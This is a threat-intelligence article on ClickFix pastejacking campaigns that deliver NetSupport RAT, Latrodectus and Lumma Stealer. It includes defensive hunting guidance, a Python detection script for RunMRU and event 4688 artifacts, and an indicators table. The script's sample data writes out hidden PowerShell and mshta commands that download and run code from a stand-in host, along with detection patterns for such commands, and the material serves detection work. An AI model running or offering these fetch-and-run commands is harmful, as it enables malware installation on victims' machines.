The Emerging Technique Threat Actors Use to Dominate Targeted Organizations
Threat actors have increasingly adopted ClickFix, a sophisticated social engineering technique that deceives users into executing malicious commands under the guise of resolving common computer issues like performance lags or pop-up errors.
This method, often delivered via compromised websites, malvertising, YouTube tutorials, or fake tech support forums, relies on clipboard hijacking, also known as pastejacking, to place a harmful command in the victim's clipboard.
Victims are then instructed to paste and run that command via Windows shortcuts such as Win+R (the Run dialog) or Win+X (a terminal from the power-user menu). Because the victim launches the command themselves, the technique sidesteps controls that key on exploits, malicious attachments, or direct downloads.
Unit 42 researchers have tracked a surge in ClickFix campaigns, impacting diverse industries including high technology, financial services, manufacturing, and government sectors.
With nearly a dozen incident response cases linked to ClickFix as the initial access vector, this technique has enabled full organizational takeovers, leading to credential theft, data exfiltration, and ransomware deployments.
The payloads vary, from infostealers to remote access trojans (RATs), but all exploit human trust in legitimate-seeming fixes; detection is harder than for a conventional dropper, yet still feasible through host artifacts such as registry keys and event logs.
Prominent Campaigns
Among the most notable 2025 campaigns, attackers distributing NetSupport RAT have leveraged fake DocuSign and Okta pages on domains like docusign.sa[.]com and oktacheck.it[.]com, likely tied to ClearFake infrastructure.

These lures inject PowerShell commands that download ZIP archives containing legitimate Java binaries that sideload malicious DLLs, ultimately deploying the RAT on the endpoint.
Similarly, Latrodectus malware campaigns, active in March-April, redirect users from compromised sites to verification pages that pastejack PowerShell scripts, downloading JavaScript droppers obfuscated with junk JSON variables.
These droppers run MSI packages that write Latrodectus to disk as libcef.dll, which a legitimate binary then sideloads; Lumma Stealer often follows as a second-stage payload.
Lumma Stealer operations, surging in April, use typosquatted domains like iplogger[.]co to deliver MSHTA commands that fetch encoded PowerShell scripts, which in turn extract an AutoIt-based loader from a CAB file (Boat.pst); the stealer then harvests browser credentials and exfiltrates them to C2 servers such as sumeriavgv[.]digital.
These campaigns demonstrate ClickFix’s adaptability, incorporating new loaders and obfuscation to target sectors like automotive, energy, and IT.
Organizational Defenses
Hunting for ClickFix infections starts with the Windows artifacts the technique leaves behind: the per-user RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which records what was typed into the Run dialog and may hold obfuscated commands or keywords pointing to a payload download, and Security event ID 4688 (process creation) entries in which explorer.exe spawns an interpreter such as powershell.exe or mshta.exe.
For Win+X variants, where the victim opens an elevated terminal from the power-user menu, correlate elevated PowerShell sessions with object access events or clipboard paste activity.
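As an added example (not code from the Unit 42 report or from Palo Alto Networks), the following Python script triages the two artifacts named above offline: a RunMRU export and a set of Security event ID 4688 records. The field names, the scoring threshold, and the sample data are constructed for illustration, and `example.invalid` stands in for whatever lure domain a real campaign uses.

```python
"""Added example (not Unit 42's code): offline triage of the two ClickFix artifacts named in
the report, the RunMRU key and Security event ID 4688, against constructed sample data."""
import base64
import re
from dataclasses import dataclass, field

# Signals a ClickFix one-liner usually carries: a script host, a download/eval primitive,
# and PowerShell evasion switches.  Word boundaries stop "irm" matching inside "confirm".
INTERPRETERS = {"powershell", "pwsh", "mshta", "cmd", "curl", "certutil", "msiexec", "rundll32"}
DOWNLOAD_RE = re.compile(
    r"\b(?:iex|irm|iwr|invoke-expression|invoke-restmethod|invoke-webrequest|downloadstring|mshta)\b"
    r"|https?://", re.I)
EVASION_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|-nop(?:rofile)?\b"
    r"|-e(?:nc|ncodedcommand|c)?\b", re.I)
THRESHOLD = 3   # roughly interpreter + download + evasion; tune to the environment


@dataclass
class Finding:
    source: str                  # "RunMRU:<value name>" or "4688:<record id>"
    command: str
    score: int
    reasons: list[str] = field(default_factory=list)


def decode_encoded_command(cmd: str):
    """Return the plaintext behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmd: str):
    """Score one command line; returns (score, sorted reasons)."""
    reasons = set()
    tokens = cmd.split()
    exe = tokens[0].strip('"').rsplit("\\", 1)[-1].lower().removesuffix(".exe") if tokens else ""
    if exe in INTERPRETERS:
        reasons.add(f"interpreter:{exe}")
    decoded = decode_encoded_command(cmd)
    if decoded:
        reasons.add("encoded-command")
    text = cmd + (" " + decoded if decoded else "")   # hunt the decoded payload, not just the wrapper
    for m in DOWNLOAD_RE.findall(text):
        reasons.add("download:" + m.lower())
    for m in EVASION_RE.findall(text):
        reasons.add("evasion:" + " ".join(m.lower().split()))
    return len(reasons), sorted(reasons)


def hunt_runmru(values: dict) -> list:
    """Walk HKCU\\...\\Explorer\\RunMRU in MRUList order (most recent first).
    Each value holds '<command>\\1'; the trailing '\\1' is stripped before scoring."""
    findings = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue
        cmd = raw.removesuffix("\\1")
        score, reasons = score_command(cmd)
        if score >= THRESHOLD:
            findings.append(Finding(f"RunMRU:{name}", cmd, score, reasons))
    return findings


def hunt_4688(events: list, parent: str = "explorer.exe") -> list:
    """Flag process creations whose parent is the shell (what a Win+R launch looks like)
    and whose command line scores.  TokenElevationType %%1937 means a full (elevated) token."""
    findings = []
    for ev in events:
        if not ev.get("ParentProcessName", "").lower().endswith("\\" + parent):
            continue
        cmd = ev.get("CommandLine") or ev["NewProcessName"]  # CommandLine needs the audit policy on
        score, reasons = score_command(cmd)
        if ev.get("TokenElevationType") == "%%1937":
            score, reasons = score + 1, reasons + ["elevated"]
        if score >= THRESHOLD:
            findings.append(Finding(f"4688:{ev['RecordId']}", cmd, score, reasons))
    return findings


# --- constructed sample data (not real IOCs) -------------------------------------------
_ENC = base64.b64encode("mshta https://example.invalid/verify".encode("utf-16-le")).decode()
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\finance\\1",
    "c": 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/fix)"\\1',
    "d": f"powershell -nop -enc {_ENC}\\1",
}
SAMPLE_4688 = [
    {"RecordId": 41, "ParentProcessName": r"C:\Windows\explorer.exe", "TokenElevationType": "%%1938",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/fix)"'},
    {"RecordId": 42, "ParentProcessName": r"C:\Windows\explorer.exe", "TokenElevationType": "%%1938",
     "NewProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad"},
    {"RecordId": 43, "ParentProcessName": r"C:\Windows\System32\svchost.exe",   # task, not a shell launch
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ep bypass -file C:\Scripts\inventory.ps1"},
    {"RecordId": 44, "ParentProcessName": r"C:\Windows\explorer.exe", "TokenElevationType": "%%1937",
     "NewProcessName": r"C:\Windows\System32\mshta.exe", "CommandLine": "mshta https://example.invalid/verify.hta"},
]

if __name__ == "__main__":
    for f in hunt_runmru(SAMPLE_RUNMRU) + hunt_4688(SAMPLE_4688):
        print(f"{f.source:12} score={f.score} {f.reasons}\n    {f.command[:90]}")
```

Two practical caveats: the CommandLine field only exists in 4688 records if "Include command line in process creation events" is enabled in audit policy, so on hosts without it the parent/child pair alone has to carry the hunt; and keyword matching on the raw RunMRU value misses `-EncodedCommand` payloads, which is why the scorer decodes the base64 UTF-16LE argument and hunts inside it as well.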
According to the report, Palo Alto Networks' Advanced WildFire, URL Filtering, DNS Security, Cortex XDR, and XSIAM provide protection by detecting clipboard injections and behavioral anomalies.
Organizations should prioritize employee awareness training on suspicious lures while implementing endpoint detection and response (EDR) telemetry monitoring.
As ClickFix evolves, proactive measures are essential to counter this global threat, with Unit 42 sharing intelligence via the Cyber Threat Alliance for broader defenses.
Indicators of Compromise (IOCs)
Category | Indicator | Description |
---|---|---|
SHA256 (Lumma Stealer) | 2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef | PartyContinued.exe |
SHA256 (Lumma Stealer) | 06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7 | Boat.pst (CAB file) |
Domains (Lumma Stealer) | iplogger[.]co, stuffgull[.]top, sumeriavgv[.]digital, pub-164d8d82c41c4e1b871bc21802a18154.r2[.]dev, etc. | Typosquatted and C2 domains |
SHA256 (Latrodectus) | 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1 | libcef.dll |
SHA256 (Latrodectus) | 52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293 | PowerShell Downloader |
C2 URLs (Latrodectus) | hxxps[:]//webbs[.]live/on/, hxxps[:]//diab[.]live/up/, etc. | Command-and-control endpoints |
SHA256 (NetSupport RAT) | 5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D | data_3.bin (XOR encrypted stager) |
SHA256 (NetSupport RAT) | CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527 | msvcp140.dll (loader) |
Domains (NetSupport RAT) | oktacheck.it[.]com, docusign.sa[.]com, mh-sns[.]com, lasix20[.]com | Fake and C2 domains |